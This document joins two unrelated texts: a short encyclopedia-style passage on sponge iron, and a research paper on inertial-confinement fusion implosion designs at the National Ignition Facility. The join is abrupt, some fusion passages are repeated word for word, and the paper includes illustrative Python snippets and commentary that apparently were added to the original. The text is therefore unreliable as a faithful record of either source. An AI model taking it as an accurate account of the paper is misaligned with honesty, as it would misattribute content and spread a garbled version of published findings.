Sponge iron is not useful by itself, but can be processed to create wrought iron. The sponge is removed from the furnace, called a bloomery, and repeatedly beaten with heavy hammers and folded over to remove the slag, oxidise any carbon or carbide and weld the iron together. This treatment usually creates wrought iron with about three percent slag and a fraction of a percent of other impurities. Further treatment may add controlled amounts of carbon, allowing various kinds of heat treatment (e.g. "steeling"). Today, sponge iron is created by reducing iron ore without melting it. This makes for an energy-efficient feedstock for specialty steel manufacturers which used to rely upon scrap metal.

References

1. "What is direct reduced iron (DRI)? Definition and meaning". Businessdictionary.com. Retrieved 2011-07-11.
2. Fruehan, R. J., et al. (2000). Theoretical Minimum Energies to Produce Steel (for Selected Conditions).
3. Hattwig, Martin; Steen, Henrikus (2004). Handbook of Explosion Prevention and Protection. Wiley-VCH. pp. 269–270. ISBN 978-3-527-30718-0.
Design of inertial fusion implosions reaching the burning plasma regime

Abstract

In a burning plasma state1,2,3,4,5,6,7, alpha particles from deuterium–tritium fusion reactions redeposit their energy and are the dominant source of heating. This state has recently been achieved at the US National Ignition Facility8 using indirect-drive inertial-confinement fusion. Our experiments use a laser-generated radiation-filled cavity (a hohlraum) to spherically implode capsules containing deuterium and tritium fuel in a central hot spot where the fusion reactions occur. We have developed more efficient hohlraums to implode larger fusion targets compared with previous experiments9,10. This delivered more energy to the hot spot, whereas other parameters were optimized to maintain the high pressures required for inertial-confinement fusion. We also report improvements in implosion symmetry control by moving energy between the laser beams11,12,13,14,15,16 and designing advanced hohlraum geometry17 that allows for these larger implosions to be driven at the present laser energy and power capability of the National Ignition Facility. These design changes resulted in fusion powers of 1.5 petawatts, greater than the input power of the laser, and 170 kJ of fusion energy18,19. Radiation hydrodynamics simulations20,21 show energy deposition by alpha particles as the dominant term in the hot-spot energy balance, indicative of a burning plasma state.

Main

Inertially confined fusion plasmas at the US National Ignition Facility (NIF) use a rocket-like ablation effect to compress millimetre-sized capsules filled with deuterium–tritium (DT) fuel to hundreds of billions of times the pressure of Earth's atmosphere, the conditions required for fusion and subsequent alpha heating. The rocket is created when the outer layers of the capsules containing nuclear fuel are ablated by an intense X-ray radiation bath that is generated when the 192 laser beams of the NIF illuminate the inside of a gold-lined depleted uranium X-ray conversion cavity called a 'hohlraum'. The remaining capsule mass and fuel are accelerated towards the centre of the DT gas core at extreme implosion velocities (vimp) of nearly 400 km s–1. During stagnation, the kinetic energy of the imploding shell and DT fuel is converted into internal energy in a dense fuel layer surrounding a central lower density 'hot spot' where most of the fusion reactions occur. Symmetric compression of the DT fuel surrounding the hot spot is essential for providing inertial confinement and time for the alpha particles to redeposit their energy before the system explodes and rapidly cools as it expands, as well as achieving adequate areal densities required for sufficient alpha deposition. This redeposition of alpha-particle energy back into the hot spot leads to further fusion reactions and amplified neutron yield. The DT fuel is more compressible when its entropy is lower, described by the fuel adiabat (α = plasma pressure/Fermi pressure).
A low adiabat is accomplished by raising the ablation pressure (Pabl) in steps before accelerating the shell inwards, with each step adding a limited amount of entropy through the shock compression of previously shocked fuel. After the maximum ablation pressure is achieved, it is important to maintain the ablation pressure as late into the implosion as possible to minimize fuel decompression before the formation of the hot spot. The total number of neutrons produced from the fusion reactions, or neutron yield (Y), of an inertially confined fusion plasma can be related to a few key implosion properties:

$$Y = P_{\mathrm{abl}}^{16/25}\left(\frac{v_{\mathrm{imp}}^{67/15}}{\alpha^{36/25}}\right)S^{14/3}\left(1-\mathrm{RKE}\right)^{23/7}\,\eta\,,$$

(1)

where implosions of a larger scale (S) can result in a greater number of fusion reactions if the other aspects of the implosion can be maintained, which is called the 'HYBRID' strategy1. Measurable perturbations such as non-sphericity in the imploding shell and fuel can reduce the efficiency of the implosion to do mechanical work on the hot spot, as described in equation (1) by the residual (or left-over) kinetic energy (RKE)22. Shorter-wavelength hydrodynamic instabilities lead to the mixing of capsule material into the DT hot spot, resulting in radiative loss or reduced compression and lower yield. This is captured in the implosion efficiency term η (ref. 23; Extended Data Table 1). The degree to which hydrodynamic instabilities can impact the implosion depends on the target design as well as features in the target that can seed instabilities such as defects in the capsule generated during fabrication, the fill tube used to introduce DT24 and a support structure that holds the capsule in the centre of the hohlraum25. The exponents in equation (1) were derived for an implosion where bremsstrahlung radiation losses balance the alpha-particle heating; although they are expected to change as the plasma starts to become dominated by alpha heating, this equation shows the relative importance of these critical parameters and can be used to guide the design space. In this work, we tripled the energy from fusion reactions compared with previous experiments by increasing the scale (S) of implosion by 10–15% along with maintaining the hot-spot pressure required for inertial-confinement fusion and other critical implosion properties described in equation (1), a strategy outlined elsewhere1. Driving larger implosions to similar velocities as smaller-scale implosions9,10 and using the same amount of laser energy requires the development of more efficient smaller hohlraums with lower radiation losses from the reduced surface area. This results in a smaller case-to-capsule ratio (CCR) or smaller hohlraum diameter for a given capsule size. Such designs are more challenging for controlling implosion symmetry, as there is less room for the laser beams to propagate beyond the expanding capsule material and wall plasma, resulting in a radiation drive deficit deep in the interior of the hohlraum. As illustrated in Fig. 1a, the more intense 'outer' laser beams reach the wall closer to the ends of the hohlraum, creating an expanding 'bubble'26,27 of gold plasma that intercepts the 'inner' beams aimed deeper towards the hohlraum waist. The resulting spatial non-uniformity in radiation temperature drives an aspherical implosion that will reduce the implosion efficiency. Larger capsules also use thicker ablators to protect against the longer times over which hydrodynamic instabilities can grow. To achieve the same shock-merger locations with thicker shells, the laser power steps needed to be more separated in time, leading to a longer-duration laser pulse and more hohlraum plasma filling.
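To make the scale dependence in equation (1) concrete, a toy evaluation treats it as a pure power law with Pabl, vimp, α, RKE and η held fixed. This is purely illustrative and stands in for none of the radiation hydrodynamics used in the actual design work:

```python
def relative_yield_from_scale(scale_ratio: float) -> float:
    """Relative neutron yield when only the capsule scale S changes."""
    return scale_ratio ** (14.0 / 3.0)

for s in (1.10, 1.15):
    print(f"{(s - 1) * 100:.0f}% larger scale -> {relative_yield_from_scale(s):.2f}x yield")
# A 10-15% increase in scale alone gives roughly 1.6-1.9x the yield,
# provided velocity, adiabat, symmetry and stability are maintained.
```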
Larger capsules also use thicker ablators to protect against the longer times over which hydrodynamic instabilities can grow. To achieve the same shock-merger locations with thicker shells, the laser power steps needed to be more separated in time, leading to a longer-duration laser pulse and more hohlraum plasma filling. Fig. 1: Hohlraum design for larger-scale capsules. figure 1 Implosion symmetry control in low-gas-fill hohlraums is accomplished via CBET12,14,15,16 from the outer laser beams (44° and 50°) to the inner beams (23° and 30°) to compensate for reduced inner-beam propagation later in time. The amount of transfer is controlled by detuning the wavelengths of the inner and outer cones relative to each other (Δλ). a, HYBRID-E cylindrical hohlraum (left) uses more CBET than the I-Raum-shaped hohlraum (right) to achieve similar X-ray flux symmetry on the capsule in part due to the larger capsule and longer pulse length. Compared with a cylinder with the same laser pulse and beam pointing, the I-Raum ‘pockets’ radially displace the expanding wall plasma caused by the outer beams, delaying interception of the inner beams. The top half of each hohlraum shows the calculated positions of the wall and capsule materials at peak power (6 ns) from radiation hydrodynamic HYDRA simulations with individual laser rays overlaid. The gold-lined depleted uranium hohlraum is orange, the HDC ablator is grey, the DT ice layer is red and the DT fill gas is light blue. The laser rays are coloured based on their power, with some rays gaining power through CBET (more red) before becoming absorbed (more blue). The left sides depict simulations without wavelength detuning, whereas the right sides include Δλ, illustrating enhanced inner-beam propagation due to CBET from a representative 44° beam to a 23° beam. Laser absorption in the gold bubble and low-density ablated HDC is visible as the ray powers transition through white from red to blue. The rays terminate (dark blue) near where the plasma density is high enough for substantial laser absorption. The bottom half of each hohlraum depicts nominal beam pointing and relative target dimensions between the two designs as visualized by VISRAD38. Further details regarding target dimensions and design parameters are given in Extended Data Fig. 5 and Extended Data Table 2, respectively. b, Energy-flow diagrams illustrating the CBET process in more detail. The four cones of beams pass energy amongst themselves due to CBET from wavelength detuning (Δλ = inner-beam (10,530.05 Å) wavelength – outer-beam (10,528.5 Å) wavelength at the fundamental neodymium glass laser frequency, 1ω) and local plasma flows, resulting in a net gain for the inner beams and a net loss for the outer beams. c, Measured hohlraum radiation temperatures using filtered X-ray diodes (top) and the delivered laser pulses (bottom) for one high-performing shot from each design. Implosion symmetry was previously controlled in small-CCR hohlraums28,29 by transferring energy between laser beams, or cross-beam energy transfer (CBET). In this process, light is scattered from one crossing laser beam to the other through an ion acoustic wave that is resonantly driven by the overlapping laser beams when they have different wavelengths or in the presence of plasma flow. However, high levels of laser–plasma-interaction instabilities reduced the hohlraum efficiency by scattering laser light back out of the hohlraum. 
However, high levels of laser–plasma-interaction instabilities reduced the hohlraum efficiency by scattering laser light back out of the hohlraum. This was largely due to the application of large amounts of energy transfer in hohlraums with higher levels of helium gas fill, designed to mitigate the expanding wall by generating a counter-pressure. These configurations also produced large amounts of inferred high-energy electrons30 that can prematurely heat the DT fuel and raise the adiabat. It was also difficult to predict and control the radiation symmetry over the entire implosion, resulting in aspherical implosions with degraded performance28,29,31. Since then, hohlraums with lower gas-fill densities of 0.03–0.60 mg cm–3 and larger CCRs were developed to reduce laser back-scatter and high-energy electron production9,10,32,33,34. These designs varied the relative laser powers and energies to control the symmetry, with no intentional energy transfer between the laser beams. This limits the total laser energy, and ultimately the maximum scale that can currently be fielded, since a fraction of the beams will be at less than the maximum capability.

Here we introduce two designs that enable increasing the capsule scale within the limits of the NIF laser while providing symmetry control in more efficient, smaller-CCR hohlraums: transferring energy between the laser beams by changing their relative wavelengths in hohlraums with low helium gas fill (HYBRID-E)11,13 and using a shaped (non-cylindrical) hohlraum to delay plasma filling for better inner-beam propagation (I-Raum)17. The first technique, as illustrated in Fig. 1, transfers energy from the 'outer' beams to the 'inner' beams, increasing the power delivered to the waist of the hohlraum in a low-back-scatter environment. Even in the presence of large amounts of transfer (up to a two-times increase in the inner-beam power), the measured laser energy coupled to the hohlraum is ≥98% (ref. 11) and the inferred level of hot electrons is more than an order of magnitude lower than previously seen in high-gas-fill hohlraums using wavelength detuning. The reduced back-scatter and laser–plasma-interaction instabilities in the presence of large amounts of transfer create a stronger observed sensitivity of implosion symmetry to wavelength detuning, allowing for radiation-symmetry control throughout the drive history11,22. The HYBRID-E design demonstrates the use of wavelength detuning in a hohlraum with a gas-fill density of 0.3 mg cm–3. The I-Raum17 concept adds engineered pockets in the wall to displace the plasma blowoff generated by the outer beams radially outwards, delaying its expansion into the inner beams compared with a cylinder having the same pointing and pulse shape; in addition, wavelength detuning was used to control symmetry. Both platforms used data-driven models26 to guide the hohlraum design choices that impact the extent of the 'bubble' and the implosion symmetry (Methods).

The top half of Fig. 1a shows HYDRA20,21 radiation hydrodynamic simulations of the two designs midway through peak power, at 6 ns after the start of the laser pulse (Methods provides a description of the simulation methodology). The colour contours show the material boundaries: gold shows the expanding hohlraum wall plasma; grey, the expanding capsule ablator; red, the inwards-moving cryogenic DT fuel layer; and light blue, the DT gas. The so-called 'gold bubble'26,27 launched by the outer (44° and 50°) beams can be seen intercepting the inner beams (23° and 30°) and interacting with the capsule blowoff.
Simulated laser rays, coloured by the spatially varying power as energy is exchanged or absorbed, illustrate the impact of CBET with wavelength detuning (for HYBRID-E, Δλ = inner-beam wavelength (10,530.05 Å) − outer-beam wavelength (10,528.5 Å) at the fundamental neodymium glass laser frequency (1ω), before conversion to the third harmonic at 351 nm) by comparing simulations with no detuning (left) to simulations that include detuning (right). With CBET, a substantial amount of power is transferred from the outer to the inner beams, enhancing the drive at the hohlraum waist. The white band of inner-beam absorption in the simulations without CBET traces the position of the expanding gold bubble and also indicates laser absorption in the capsule ablator. Figure 1b also shows the total calculated energy transfer between the laser cones for the two designs. Less energy transfer between the beams was required in the I-Raum design due to the outwards bubble displacement by the pockets, the smaller-scale capsule and the shorter laser pulse length resulting from the thinner DT ice layer (with a shorter shock-transit time). Despite the I-Raum pockets, the position of the bubble is similar for the two designs in this work as a result of other design differences governing the bubble growth26,27. The measured radiation temperatures (Tr; Fig. 1c) are similar, as expected for hohlraums with nearly the same surface area. The laser power histories for each design, with the different 'epochs' labelled, are also shown in Fig. 1c.

Figure 2 shows that the designs presented in this work (red and blue points) realized the benefit of higher capsule-absorbed energy (to increase the energy delivered to the hot spot) compared with previous high-density carbon (HDC) campaign or Bigfoot implosions (grey points) by operating at a larger scale, but only when improving or maintaining the other metrics in equation (1). The expected extrapolations in performance to higher levels of capsule-absorbed energy from a smaller-scale HDC campaign implosion, N170601 (ref. 35), are also shown; these were calculated using radiation hydrodynamic simulations in two and three dimensions. Here the symmetry (Extended Data Fig. 1), stability (Extended Data Fig. 2), implosion velocity, adiabat and inflight ablation pressure were maintained in the scaling.

Fig. 2: Proximity to expectations and optimization. Neutron yield as a function of capsule-absorbed energy for the I-Raum (blue, closed symbols; N210220 and N201122) and HYBRID-E (red, closed symbols; N210207, N210307 and N201101) experiments in this work together with previous HDC campaign experiments9 (grey points), and two- and three-dimensional simulations of scaling the capsule-absorbed energy from N170601 (ref. 35) (solid black lines). The capsule-absorbed energy quoted for each experiment is derived from simulations, and the error bars represent the maximum range over which the simulated bang time remains consistent with the measurements when fine-tuning the X-ray drive to calibrate the experiments. The experiments in this work follow the predictions when the other important implosion properties in the yield equation (equation (1)) are also maintained, such as velocity, adiabat, 'coast time', stability and symmetry. Then, the capsule-absorbed energy can be efficiently converted into hot-spot internal energy and pressure.
Additional experiments in the I-Raum and HYBRID-E campaigns led to the optimization in this work (open symbols; N190217, N191105, N201011, N200229 and N191110) but were compromised by known degradations to the terms in equation (1), as discussed in the main text. The present experiments are not directly hydrodynamically scaled from N170601, however, and improve on certain aspects of the implosion, for example, low-mode asymmetries. Therefore, the present experiments are not expected to follow these trend lines exactly, but the trend lines provide a guideline for the potential improvement when scaling up the implosion size at a similar adiabat and implosion velocity.

The larger-scale I-Raum (blue) and HYBRID-E (red) designs absorb more energy but use larger hohlraums (lower Tr) compared with N170601 to maintain symmetry, and require thicker ablators or DT layers to maintain stability (Methods), which results in similar implosion velocities (Table 1). Because the mergers of the first and second shocks occur inside the DT ice, at ~10 μm larger radius than the ice–gas interface, the fuel adiabats at peak velocity were slightly higher for both designs (3.0–3.2) compared with N170601 (2.5) (Table 1), and the 'coast times' were longer. However, the low-mode asymmetry, namely, mode 2 of the Legendre decomposition of the hot spot, which in N170601 was kept constant in the extrapolation to be more conservative, was improved in the highest-performing I-Raum and HYBRID-E experiments (Methods provides more details).

Table 1: Integrated implosion metrics

The progression of design or experimental optimization within the HYBRID-E and I-Raum campaigns is shown through several example points (open and closed symbols), which illustrates that the benefit of increased capsule energy can only be realized if the pressure is maintained through the other terms in equation (1). Both designs have worked to maintain the late-time ablation pressure, but continued optimization is ongoing. A metric for this is the 'coast time'36, or the time the implosion has to decompress while the radiation drive is decreasing (Table 1 and Methods), which was reduced between experiments N201011 and N201101 by extending the laser pulse, more than tripling the neutron yield. Experiment N200229, using a larger-scale capsule (inner radius, 1,100 μm), coupled more energy to the capsule than the experiments in this paper, but its 'coast time' was ~1.7 times longer, its symmetry was substantially worse (very oblate) and there were many more seeds for high-mode perturbations present in the ablator19. The other non-optimized I-Raum and HYBRID-E experiments in Fig. 2 (open symbols) are impacted by reduced implosion efficiency due to hydrodynamic instabilities or low-mode asymmetries compared with the highest performers (closed symbols) (Methods provides additional details).

By increasing the hot-spot energy, through more energy coupled to the implosion while also maintaining the hot-spot pressure, we have created a burning plasma state in the laboratory. The criteria for achieving a burning plasma state are investigated using analytical models18 and key quantities derived from high-resolution two-dimensional HYDRA simulations that reproduce the performance metrics (Methods and Table 1). The mechanical PdV work (EPdV) on the hot spot and total DT fuel from the imploding DT ice and ablator material is directly extracted from the simulations (Methods).
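As a rough cross-check of the adiabat tradeoff discussed above, the short sketch below evaluates the α^(-36/25) penalty in equation (1) for the quoted adiabats (3.0–3.2 for these designs versus 2.5 for N170601). This is illustrative only: the exponents were derived near the radiative-loss balance, and the real designs compensate through the other terms in equation (1).

```python
# Rough adiabat penalty implied by the alpha^(-36/25) term in equation (1),
# using the adiabats quoted in the text (3.0-3.2 here vs 2.5 for N170601).
# Illustrative only; all other terms in equation (1) are held fixed.
baseline_alpha = 2.5
for alpha in (3.0, 3.2):
    penalty = (alpha / baseline_alpha) ** (-36 / 25)
    print(f"alpha {alpha}: relative yield x{penalty:.2f}")
# Prints ~0.77x and ~0.70x, which the larger scale (S^(14/3)) and improved
# symmetry must more than recover.
```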
The net cumulative hot-spot energies as a function of time relative to the time of peak neutron production ('bang time') are shown in Fig. 3, where the corresponding insets show the simulated densities and temperatures at bang time. A comparison of simulations and measurements of the compressed DT shell is provided in Methods. Simulations where alpha-particle heating is artificially turned off (no-α) are also shown and enable more accurate tracking of the mechanical work.

Fig. 3: Hot-spot energy partition in the burning plasma regime. The coloured lines show the calculated cumulative hot-spot energies as a function of time for each shot. Each panel shows data from one 'burn on' simulation that includes alpha deposition (α-on; solid curves) and one 'burn off' simulation in which alpha particles leave the problem without depositing energy (no-α; dashed curves). The time axis has been scaled relative to the 'bang time', or time of peak neutron production, for each simulation with alpha deposition included. The respective (α-on, no-α) bang times in nanoseconds for shots N201101, N201122, N210207 and N210220 are (9.35, 9.30), (9.08, 9.03), (8.67, 8.60) and (8.80, 8.70), respectively. The total hot-spot internal energy (black) is increased by hydrodynamic compression (PdV work; blue) up until stagnation and by any alpha heating (green), and is reduced by bremsstrahlung radiation losses (red) and hydrodynamic expansion after stagnation (PdV work; blue). For these experiments, after entering the burning plasma regime, alpha-particle heating outstrips the radiation losses, becoming the dominant term in the hot-spot energy balance. The insets illustrate the simulated configuration of the hot spot and dense surrounding shell, with density (g cm–3) on the left half and ion temperature (keV) on the right half. The hot spot is defined as a fixed collection of DT mass, tracked over time, that gives 98% of the neutron production at peak burn. The maximum (density (g cm–3), ion temperature (keV)) values for shots N201101, N201122, N210207 and N210220 are (350, 7.31), (450, 6.49), (350, 8.40) and (450, 7.20), respectively.

We now demonstrate that these four experiments enter the burning plasma regime based on several different metrics. We find that the net energy from alpha-particle heating at bang time (\(E_{\alpha}^{\mathrm{a,b}}\)) is greater than the energy from work done on the hot spot (EPdV) at bang time for three out of the four experiments, and is thus the dominant source in the energy balance equation \(E_{\mathrm{IE}} = E_{\alpha} + E_{P\mathrm{d}V} - E_{\mathrm{rad}} - E_{\mathrm{cond}}\). (See Table 1 for an explanation of the nomenclature; superscript 'a' indicates the quantity is taken at peak neutron production, or 'bang time', and superscript 'b' indicates the quantity is extracted from the data shown in Fig. 3.) Although the simulated metric \(E_{\alpha}^{\mathrm{a,b}}/E_{P\mathrm{d}V,\mathrm{no}\text{-}\alpha} > 1\) is met for all four experiments, the more simplistic metric ~0.5Eα/EPdV,HS,no-α > 1 is only met by the two highest-performing experiments. The net energy from alpha-particle heating is calculated to be greater than the energy-loss terms from radiation and conduction (Erad and Econd, respectively) for all the experiments. Here the radiation losses are extracted from the simulations and the conduction losses are inferred from the energy balance equation.
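To make the bookkeeping explicit, here is a minimal sketch of the hot-spot energy balance used above. The kJ values are placeholders chosen only to show the logic of the burning-plasma test; they are not values from Table 1 or Fig. 3.

```python
# Hot-spot energy balance from the text:
#   E_IE = E_alpha + E_PdV - E_rad - E_cond
# All numbers below are hypothetical placeholders, not data from Table 1;
# the point is the bookkeeping behind the burning-plasma test
# E_alpha > E_PdV at bang time.
E_alpha = 6.0   # net alpha-particle heating at bang time, kJ (hypothetical)
E_PdV   = 5.0   # cumulative PdV work on the hot spot, kJ (hypothetical)
E_rad   = 3.0   # bremsstrahlung radiation loss, kJ (hypothetical)
E_cond  = 1.5   # conduction loss, inferred from closing the balance (hyp.)

E_IE = E_alpha + E_PdV - E_rad - E_cond
print(f"hot-spot internal energy E_IE = {E_IE:.1f} kJ")
print(f"burning plasma (E_alpha > E_PdV)?      {E_alpha > E_PdV}")
print(f"alpha heating exceeds losses?          {E_alpha > E_rad + E_cond}")
```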
Other metrics for a burning plasma include the ratio of the total energy produced by the alpha particles to the total DT kinetic energy (Eα/KE > 1), which is met by all four experiments. Additionally, the burning plasma criterion for yield amplification2, the increase in yield due to alpha-particle heating (Yamp ≥ 3.5), is met by all four experiments, and the fuel gain criterion (Gfuel)28, the ratio of the total fusion yield to the PdV work done on the hot spot and compressed DT ice (DT EPdV,no-α), is met by three experiments. Finally, the Hurricane model criterion for assessing a burning plasma state using the simulated hot-spot areal density, ion temperature and implosion velocity (vcond/vimp) is met by all four experiments. In summary, N210207 meets all the criteria, with alpha heating also dominating the full energy balance including the hot-spot internal energy; two experiments meet all the criteria; and all four experiments meet several of the criteria for a burning plasma.

Future experiments will continue to optimize these platforms by reducing the sources of high-mode perturbations (for example, capsule defects and the DT fill tube), reducing the adiabat by improving the shock timing and the rate of the final rise to peak laser power, and improving the hot-spot pressure or energy coupling with even more efficient hohlraums or by varying the DT ice thickness (Methods). These improvements are calculated to have large impacts on performance; for example, reducing the 'coast time' with a smaller laser entrance hole (LEH) is calculated to improve the performance by almost two times. As this paper was being finalized, a new experiment in the HYBRID-E series on 8 August 2021 produced ~1.35 MJ of fusion yield and a capsule gain of ~6, a significant achievement for the field of ICF (announced by our institution in a press release37); this experiment will be described in a future publication. In addition, we continue to study the tradeoffs between the ablator and DT thickness ratios for large-scale implosions, which is important for understanding the limitations on design choices for future designs that increase the scale beyond those in this paper.

Methods

Additional design parameters

The HYBRID-E and I-Raum designs use similar hohlraum surface areas (2.5 cm² for HYBRID-E and 2.6 cm² for I-Raum) and lengths, and the same size of LEHs, the main source of radiation loss, which led to similar radiation temperatures (Fig. 1). The HYBRID-E shots N201101 and N210207 use wavelength separations of 1.75 and 1.55 Å, respectively, between the outer and inner beams to implode an HDC capsule (inner radius, 1,050 μm) filled with a 65-μm-thick frozen DT 'ice' layer (density ≈ 0.25 g cm–3) with sufficient drive at the hohlraum equator. The I-Raum shots N201122 and N210220 use pockets recessed by 260 μm together with a 0.5 Å wavelength separation to drive a diamond capsule (inner radius, 1,000 μm) filled with a 55-μm-thick frozen DT 'ice' layer. The outer surface areas of the ablators were 16 mm² for HYBRID-E and 14.7 mm² for I-Raum. Extended Data Fig. 5 provides additional hohlraum design dimensions. Both designs used an HDC ablator (capsule) with either nanocrystalline or microcrystalline structure39 and a W dopant layer to act as a preheat shield against high-energy hohlraum X-rays and to provide a more stable Atwood number35,40.
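As a quick consistency check on the capsule dimensions just quoted, the back-of-envelope sketch below estimates the DT ice mass of each design from a spherical-shell volume. The paper does not quote these masses, and the I-Raum ice density is assumed here to equal the ≈0.25 g cm–3 quoted for HYBRID-E.

```python
import math

# DT ice mass implied by the quoted capsule dimensions (HYBRID-E: inner
# radius 1,050 um with a 65-um layer; I-Raum: 1,000 um with a 55-um layer).
# The ~0.25 g/cm^3 density is quoted for HYBRID-E and assumed for I-Raum;
# the masses themselves are not quoted in the paper.
def shell_mass_ug(r_inner_um, thickness_um, rho_g_cc=0.25):
    r_in = r_inner_um * 1e-4                   # um -> cm
    r_out = (r_inner_um + thickness_um) * 1e-4
    volume = 4.0 / 3.0 * math.pi * (r_out**3 - r_in**3)   # cm^3
    return volume * rho_g_cc * 1e6             # g -> micrograms

print(f"HYBRID-E DT ice: ~{shell_mass_ug(1050, 65):.0f} ug")
print(f"I-Raum DT ice:   ~{shell_mass_ug(1000, 55):.0f} ug")
```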
Both designs increase the ablator thickness compared with smaller-scale implosions9,10, which is required when hydroscaling (hydrodynamically scaling) a design to shield against the longer time over which hydrodynamic instabilities can grow. The I-Raum design used an ablator whose increase in effective thickness (~14%) exceeded the increase in capsule scale (~10% increase in capsule radius) compared with the HDC campaign9. The 'effective' thickness accounts for the difference in crystalline structure between the designs (microcrystalline for HDC and Bigfoot), which changes the HDC density: nanocrystalline ablators have lower density and require thicker layers for the same 'effective' layer thickness compared with microcrystalline HDC, conserving the total initial ablator mass to provide similar amounts of ablator mass remaining following ablation by the radiation drive. The HYBRID-E design increased the ablator thickness compared with the HDC campaign design, but by less than the increase in capsule scale (~10% thicker versus an increase in capsule scale of ~15%). However, the HYBRID-E thickness is consistent with a separate recent prescription for hydroscaling35, which accounts for the fact that the penetration depth of the X-ray radiation drive does not hydrodynamically scale. This choice was initially made, given the current radiation drive, to enable driving a thicker DT ice layer than in the hydroscaled version (~18% increase in thickness compared with a ~15% increase in capsule scale) to a similar velocity, in order to provide more protection against high-mode perturbations from the known capsule defects present in these specific capsule batches; this approach has previously been shown to be effective13. In addition, as found elsewhere35, the scaled ablator thickness should be thinned by 5 μm for every 20% increase in scale, which is consistent with the HYBRID-E design thickness as a hydroscale of the HDC campaign9 and Bigfoot10. The I-Raum design uses the same ice thickness as the HDC design, thinner than hydrodynamically scaled with the capsule radius, which may enable higher convergence and velocities for a given ablator mass remaining, provided the capsule quality is good. Experiments at the 1,050 μm inner-radius scale using thinner DT ice layers (10 μm thinner) are currently being tested; preliminary results show faster implosion velocities (+10–15 km s–1) at similar ablator mass remaining and similar levels of hot-spot mixing. The tradeoff in ablator and DT ice thicknesses versus directly hydroscaling the HDC campaign9,35 will be tested in future experiments using even more efficient hohlraums (Methods). These studies are imperative for understanding the design limitations of further increasing the capsule scale within the experimental capability of the NIF. To maintain the linear growth factors (the relative growth of a perturbation at peak implosion velocity compared with its initial size) at both interfaces when hydroscaling, the prescription from another study35 is to reduce the dopant concentration by the reciprocal of the scale increase. For HYBRID-E N210207, the dopant was lowered to 0.28% tungsten (W), consistent with this scaling when compared with the HDC campaign design (0.33% W and a similar layer thickness).
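The two hydroscaling prescriptions quoted above (thinning the scaled ablator by 5 μm per 20% scale increase, and reducing the dopant concentration by the reciprocal of the scale increase) can be written down directly. In the sketch below, the dopant baseline (0.33% W) is from the text, while the baseline ablator thickness is a hypothetical number for illustration.

```python
# Two hydroscaling prescriptions quoted from ref. 35 in the text:
#  (1) thin the naively scaled ablator by 5 um per 20% scale increase
#      (the X-ray drive penetration depth does not hydroscale), and
#  (2) reduce the dopant concentration by the reciprocal of the scale
#      increase to preserve linear growth factors.
def scaled_ablator_um(base_um, s):
    return base_um * s - 5.0 * (s - 1.0) / 0.20

def scaled_dopant_pct(base_pct, s):
    return base_pct / s

s = 1.15  # ~15% capsule-scale increase for HYBRID-E vs the HDC campaign
# Baseline thickness of 80 um is hypothetical; 0.33% W is from the text.
print(f"ablator: ~{scaled_ablator_um(80.0, s):.1f} um (naive: {80.0 * s:.1f} um)")
print(f"dopant:  ~{scaled_dopant_pct(0.33, s):.2f}% W")  # ~0.29%, cf. 0.28% fielded
```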
HYBRID-E experiment N201101 used an HDC capsule with a higher optical depth (dopant concentration times dopant layer thickness) compared with the HDC campaign design (Extended Data Table 2), but performed similarly to N210207 when accounting for the difference in the hot-spot and dense-fuel symmetry. The doped layer in the I-Raum design was thicker than that of HYBRID-E or of the scaled HDC campaign and Bigfoot designs, which resulted in lower growth factors at the fuel–ablator interface and higher growth factors at the ablation front compared with HDC or HYBRID-E (Extended Data Fig. 2). Uncertainties in the hohlraum atomic models used in this work could lead to growth factors at the ablation front that are ~200 higher than those shown in Extended Data Fig. 2 for both designs. Another factor when designing for implosion stability is the early part of the laser pulse (called the 'picket'), which launches the first shock and impacts the steepness of the ablation-front profile; a higher early-time ablation pressure can reduce perturbation growth factors at the ablation front. The HYBRID-E and I-Raum designs had similar first-shock radiation temperatures, which was achieved with a lower picket power for HYBRID-E due to the smaller CCR where the outer beams hit the hohlraum wall compared with I-Raum. This led to similar first-shock strengths (>12 Mbar), designed to avoid the refreezing of the diamond behind the shock front and in the reflected shock, as well as similar fuel adiabats at peak velocity.

A short 'coast time', nominally the time between the maximum radiation temperature and bang time (maximum compression), is important for maintaining the ablation pressure and achieving high hot-spot pressures and fuel compression36, but is more challenging with a fixed laser energy and for maintaining symmetry. A ramped (or 'drooping') laser pulse10,41 was used in HYBRID-E, designed to help maintain the late-time ablation pressure at the larger scale and to enable the full use of the NIF laser (Extended Data Fig. 1). For the experiments in this paper, the coast times (defined as the time between the bang time and the time at which Tr falls to 95% of its maximum) are similar, but shorter for HYBRID-E due to the ramped laser power at the end of the pulse. A metric related to coast time is the deceleration time, the time between peak implosion velocity and bang time. This is approximately Rpv/vimp, where Rpv is the radius at peak velocity and vimp is the implosion velocity, though it can differ slightly from the calculated deceleration time because the velocity changes over the deceleration phase (Table 1). The increased deceleration rate associated with a short coast increases the rate at which implosion kinetic energy is turned into internal energy. For a fixed vimp, a larger-scale implosion will have a longer deceleration time; it is therefore necessary to compensate by keeping the late-time hohlraum temperature hot (maintaining a higher late-time ablation pressure) through an extended laser pulse (Table 1), which was longer for HYBRID-E versus I-Raum after accounting for the scale factor. In the limit of zero coast time, the pressure inside the implosion, which is responsible for deceleration, rapidly overwhelms the ablation pressure outside the implosion, and the impact of further extending the radiation drive is reduced.
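The Rpv/vimp estimate above is easy to evaluate for a rough sense of timescale. Both input values in this sketch are assumptions chosen to be of the right order for NIF-scale implosions, not numbers from Table 1.

```python
# Order-of-magnitude deceleration time ~ R_pv / v_imp, as described in
# the text. Both inputs are illustrative assumptions, not Table 1 data.
R_pv = 300e-6     # radius at peak implosion velocity, m (assumed)
v_imp = 380e3     # implosion velocity, m/s (assumed, typical NIF scale)

t_decel = R_pv / v_imp
print(f"deceleration time ~ {t_decel * 1e9:.2f} ns")
# At fixed v_imp, a 1.15x larger-scale implosion has a proportionally
# larger R_pv and hence a longer deceleration time, which is why the
# drive must be kept on later (shorter coast time) at larger scale.
print(f"at 1.15x scale:   ~ {1.15 * t_decel * 1e9:.2f} ns")
```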
